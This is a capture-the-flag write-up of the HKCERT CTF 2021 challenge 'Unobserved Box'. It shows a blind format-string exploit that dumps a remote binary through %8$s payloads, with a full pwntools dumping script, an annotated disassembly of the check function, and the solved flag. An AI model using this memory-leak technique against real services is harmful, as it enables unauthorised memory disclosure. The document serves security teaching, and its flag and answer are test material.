Blog by grhkm

Unobserved Box (250 pts, 6 solves)

Team Name: O0027 - UND3r 20 D53 H473r5 4ND r374K3r

Solved by: grhkm and Kaiziron

Source of the problem: HKCERT CTF 2021

Problem Statement

All codes are uncertain before the measurement, and you will never make it.

Observe the code to get the flag.

nc chalp.hkcert21.pwnable.hk 28132

Solution Outline

We dump the binary from 0x400000 to 0x405000 using a format string vulnerability and %8$s, then reverse engineer the check function to recover the answer that unlocks the flag.

Initial Discoveries

Let’s have a look at the server:

❯ nc chalp.hkcert21.pwnable.hk 28132
AAAAAAAA
AAAAAAAA is not the correct answer.

❯ python3 -c "print('A' * 200)" | nc chalp.hkcert21.pwnable.hk 28132
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA is not the correct answer.

❯ python3 -c "print('A' * 2000)" | nc chalp.hkcert21.pwnable.hk 28132
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA is not the correct answer.

❯ python3 -c "print('%p|' * 25)" | nc chalp.hkcert21.pwnable.hk 28132
0x7fffe0708a40|0x7fffe0708a40|(nil)|0x7fcf5ced7d80|0x7fcf5ced7d80|0x70257c70257c7025|0x257c70257c70257c|0x7c70257c70257c70|0x257c70257c7025|0x401490| is not the correct answer.

Woah, we just found a format string vulnerability!
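To see where our input sits among the leaked values, we can decode each %p value as little-endian bytes. The sketch below just post-processes the output shown above; the helper name `decode` is made up for illustration.

```python
# Output copied from the '%p|' * 25 run above (without the trailing message).
leak = ("0x7fffe0708a40|0x7fffe0708a40|(nil)|0x7fcf5ced7d80|0x7fcf5ced7d80|"
        "0x70257c70257c7025|0x257c70257c70257c|0x7c70257c70257c70|"
        "0x257c70257c7025|0x401490|")


def decode(value: str) -> bytes:
    """Interpret one %p value as the little-endian bytes it was read from."""
    if value == "(nil)":
        return b""
    return int(value, 16).to_bytes(8, "little").rstrip(b"\x00")


values = leak.rstrip("|").split("|")
for position, value in enumerate(values, start=1):
    print(position, value, decode(value))

# First positional argument whose bytes are the start of our own input
first_input_arg = next(
    i for i, v in enumerate(values, start=1) if decode(v).startswith(b"%p|")
)
print("input starts at argument", first_input_arg)
```

Arguments 6 to 9 decode back to pieces of `%p|%p|...`, so the input buffer begins at the 6th positional argument.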

Dumping Binary

With the format string vulnerability in hand, let’s tweak the payload until one of its arguments reads from our own input:

❯ python3 -c "print('%p' + '|' + 'A' * 20)" | nc chalp.hkcert21.pwnable.hk 28132
0x7ffc5c5ede60|AAAAAAAAAAAAAAAAAAAA is not the correct answer.

❯ python3 -c "print('%1\$p' + '|' + 'A' * 20)" | nc chalp.hkcert21.pwnable.hk 28132
0x7fffebbd6ef0|AAAAAAAAAAAAAAAAAAAA is not the correct answer.

...

❯ python3 -c "print('%8\$p' + '|' + 'A' * 20)" | nc chalp.hkcert21.pwnable.hk 28132
0x4141414141414141|AAAAAAAAAAAAAAAAAAAA is not the correct answer.

Now that %8$p reads from our input, how about we place an address there? More importantly, non-PIE 64-bit binaries are usually loaded at 0x400000 (the 0x401490 leaked earlier points the same way), so we can explore that:

❯ python3 -c "print('%8\$p' + '|' + 'ABCDEFGHIJKLMNOPQRST')" | nc chalp.hkcert21.pwnable.hk 28132
0x535251504f4e4d4c|ABCDEFGHIJKLMNOPQRST is not the correct answer.

# 0x53 -> S, 0x4c -> L
❯ python3 -c "print('%8\$p' + '|' + 'ABCDEFGHIJK________')" | nc chalp.hkcert21.pwnable.hk 28132
0x5f5f5f5f5f5f5f5f|ABCDEFGHIJK________ is not the correct answer.

❯ python3 -c "print('%8\$p' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132
0x400000|ABCDEFGHIJK is not the correct answer.
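The layout of these payloads can be written down as a small helper. This is only a sketch: it assumes, based on the %p output earlier, that the 6th argument is the first 8 bytes of our input, so the 8th argument is at offset 16. The names `build_payload` and `FIRST_INPUT_ARG` are made up for illustration.

```python
import struct

FIRST_INPUT_ARG = 6  # assumption: argument 6 holds input bytes 0..7
WORD = 8             # each positional argument is one 8-byte word


def build_payload(addr: int, arg_index: int = 8, conversion: bytes = b"s") -> bytes:
    """Place a little-endian address exactly where %<arg_index>$ will read it."""
    prefix = b"%" + str(arg_index).encode() + b"$" + conversion + b"|"
    offset = (arg_index - FIRST_INPUT_ARG) * WORD
    if offset < len(prefix):
        raise ValueError("format prefix would overlap the address slot")
    padding = b"A" * (offset - len(prefix))
    # The address goes last: its null bytes end the string the server sees.
    return prefix + padding + struct.pack("<Q", addr)


print(build_payload(0x400000))
# Reading the earlier %8$p result backwards gives the bytes at offset 16:
print(struct.pack("<Q", 0x535251504F4E4D4C))
```

With the defaults, the 5-byte prefix `%8$s|` plus 11 padding bytes fills the first 16 bytes, which is why the commands above use the 11-character pad `ABCDEFGHIJK`.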

Great, now note that the %s conversion prints the string stored at the given address. So for example in the last command above, if we replace %8$p with %8$s, we would get:

# the magic header has appeared
❯ python3 -c "print('%8\$s' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132
ELF|ABCDEFGHIJK is not the correct answer.

❯ python3 -c "print('%8\$s' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132 | hexdump -C
00000000  7f 45 4c 46 02 01 01 7c  41 42 43 44 45 46 47 48  |.ELF...|ABCDEFGH|
00000010  49 4a 4b 20 69 73 20 6e  6f 74 20 74 68 65 20 63  |IJK is not the c|
00000020  6f 72 72 65 63 74 20 61  6e 73 77 65 72 2e 0a     |orrect answer..|
0000002f

# remember - 64-bit systems!
❯ python3 -c "print('%8\$s' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132 | python3 -c "print(input().split('|')[0], end='')" | hexdump -C
00000000  7f 45 4c 46 02 01 01                              |.ELF...|
00000007

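Hurray! Since strings are terminated by null bytes, we also know that the byte right after the output is a null byte, so we can continue from the address after it and repeat.

(Note: if there is no output, which is the case for address 0x400008, the byte at that address is itself a null byte, so we record a single null byte and move on to the next address.)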

There are a few other issues to address. An important one is when the address contains \x0a, more commonly known as \n: the payload then has a newline in the middle, and the server ignores everything after it. I simply skip such addresses, which shouldn’t cause too much of a problem - each skipped address just has its byte replaced with a null byte.
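The leak-and-advance idea, including the \n skip, can be tried offline first. The sketch below simulates the %s leak on a local byte string instead of talking to the server; `leak` and `dump_all` are made-up names, and the fake memory contents are invented for the demo.

```python
import struct

BASE = 0x400000  # assumed load address, as in the commands above


def leak(memory: bytes, addr: int) -> bytes:
    """Simulate %s: bytes from addr up to (not including) the next null byte."""
    offset = addr - BASE
    end = memory.find(b"\x00", offset)
    if end == -1:
        end = len(memory)
    return memory[offset:end]


def dump_all(memory: bytes) -> bytes:
    """Rebuild memory from repeated leaks, one null-terminated chunk at a time."""
    out = b""
    addr = BASE
    while addr < BASE + len(memory):
        if b"\n" in struct.pack("<Q", addr):
            chunk = b""  # address cannot be sent: this byte becomes a null
        else:
            chunk = leak(memory, addr)
        out += chunk + b"\x00"  # the terminator is known to be a null byte
        addr += len(chunk) + 1
    return out[:len(memory)]


fake = b"\x7fELF\x02\x01\x01\x00\x00\x00AB\x00CD"
print(dump_all(fake))
```

In this toy run the only difference from the original is the `A` at 0x40000a, which comes back as a null byte because that address contains \x0a.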

Now let’s put this all into one python script:

from pwn import *
context.log_level = 'WARNING'

conn = None
host, port = 'chalp.hkcert21.pwnable.hk', 28132


def init():
    global conn
    if conn is not None:
        conn.close()
    conn = remote(host, port)


def dump(addr):
    # Turn 0x400102 into b'\x02\x01\x40\x00\x00\x00\x00\x00' (little-endian)
    bddr = p64(addr)
    # Handling special case: '\n'
    if b'\n' in bddr:
        return b''
    # Then construct payload: [fs]|[pad][bddr]
    fs = b'%8$s'
    pad = b'ABCDEFGHIJK'
    payload = fs + b'|' + pad + bddr
    # send it!
    init()
    conn.send(payload + b'\n')
    # Match '|' plus the pad so a 0x7c byte inside the leak does not cut it short
    response = conn.recvuntil(b'|' + pad, drop=True)
    print(f'[*] {hex(addr)} => {response}')
    return response


addr = 0x400000
while addr < 0x405000:  # end of the range we want to dump
    # append, bytes
    with open('dump', 'ab') as fout:
        # ends at null byte
        res = dump(addr) + b'\0'
        addr += len(res)
        fout.write(res)
        fout.flush()

The next step is to let the code run zzz…

You can download the binary I got.

Reverse Engineering

Once we have a sufficient amount of the binary, we can open it in IDA or other tools. Looking around, we find what seems to be the check function:

Scary for a crypto one-trick!

Each block is relatively simple, and we can go through them one by one. Just a trick in general - not everything has to be checked carefully and rigorously. Looking through the code and cracking it took us one minute - guesswork and hand-waving are key!

push    rbp
mov     rbp, rsp
sub     rsp, 10h
mov     [rbp+var_8], rdi
mov     rax, [rbp+var_8]    # [rbp+var_8] is our input string (s)
mov     rdi, rax
call    sub_401060          # some libc function with a string parameter - len!
cmp     rax, 13h            # [1] len(s) == 19 (0x13)
jz      short loc_4011BA

mov     rax, [rbp+var_8]
add     rax, 6              # s[6]
movzx   eax, byte ptr [rax]
cmp     al, 5Fh             # [2] s[6] == '_' (0x5f)
jnz     short loc_4011E3

mov     rax, [rbp+var_8]
add     rax, 9
movzx   edx, byte ptr [rax] # edx = s[9]
mov     rax, [rbp+var_8]
add     rax, 6
movzx   eax, byte ptr [rax] # eax = s[6]
cmp     dl, al              # [3] s[6] == s[9]
jz      short loc_4011ED

mov     rax, [rbp+var_8]
mov     edx, 6
lea     rsi, aPrintf_0  ; "printf" # aww IDA is so nice
mov     rdi, rax
call    sub_401040          # some libc function taking (s, "printf", 6)
test    eax, eax            # probably strncmp
jz      short loc_401213    # [4] s[:6] == "printf"

mov     rax, [rbp+var_8]
add     rax, 0Ah            # start at s[10]
mov     edx, 6
lea     rsi, aDanger    ; "danger"
mov     rdi, rax
call    sub_401040
test    eax, eax            # [5] s[10:16] == "danger"
jz      short loc_40123D

mov     rax, [rbp+var_8]
add     rax, 12h
movzx   eax, byte ptr [rax]
cmp     al, 73h             # [6] s[18] == 's'
jz      short loc_401253

mov     rax, [rbp+var_8]
add     rax, 11h
movzx   eax, byte ptr [rax]
cmp     al, 75h             # [7] s[17] == 'u'
jz      short loc_401269

mov     rax, [rbp+var_8]
add     rax, 10h
movzx   eax, byte ptr [rax]
cmp     al, 6Fh             # [8] s[16] == 'o'
jz      short loc_40127F

mov     rax, [rbp+var_8]
add     rax, 2
movzx   edx, byte ptr [rax]
mov     rax, [rbp+var_8]
add     rax, 7
movzx   eax, byte ptr [rax]
cmp     dl, al              # [9] s[2] == s[7]
jz      short loc_4012A0

mov     rax, [rbp+var_8]
add     rax, 8
movzx   edx, byte ptr [rax]
mov     rax, [rbp+var_8]
add     rax, 12h
movzx   eax, byte ptr [rax]
cmp     dl, al              # [10] s[8] == s[18]
jz      short loc_4012C1

Putting them together, we have:

len(s) == 19
s[6] == '_'
s[6] == s[9]
s[:6] == "printf"
s[10:16] == "danger"
s[18] == 's'
s[17] == 'u'
s[16] == 'o'
s[2] == s[7]
s[8] == s[18]

No, don’t start writing a z3 solver script yet. Get your pen and paper and try it out!

Finally, we get s == "printf_is_dangerous". Supplying it to the remote server gives:

❯ echo printf_is_dangerous | nc chalp.hkcert21.pwnable.hk 28132
hkcert21{l3akinG_the_world_giVE_U_7H3_FLAG}

Flag: hkcert21{l3akinG_the_world_giVE_U_7H3_FLAG}
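As a sanity check, the ten constraints listed above can be mirrored in a few lines of Python. This is a sketch of the constraint list only, not a decompilation: it ignores the exact branch directions in the disassembly, and `check` is a made-up name.

```python
def check(s: str) -> bool:
    """Mirror constraints [1] to [10] recovered from the disassembly."""
    return (
        len(s) == 19                # [1], checked first so indexing is safe
        and s[6] == "_"             # [2]
        and s[6] == s[9]            # [3]
        and s[:6] == "printf"       # [4]
        and s[10:16] == "danger"    # [5]
        and s[18] == "s"            # [6]
        and s[17] == "u"            # [7]
        and s[16] == "o"            # [8]
        and s[2] == s[7]            # [9]
        and s[8] == s[18]           # [10]
    )


print(check("printf_is_dangerous"))
print(check("A" * 19))
```

Every position is pinned down either directly or through another position, so the pen-and-paper answer is the only string that passes.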

Remarks

If this is your first time seeing a blind format string challenge, here are some good writeups from previous challenges: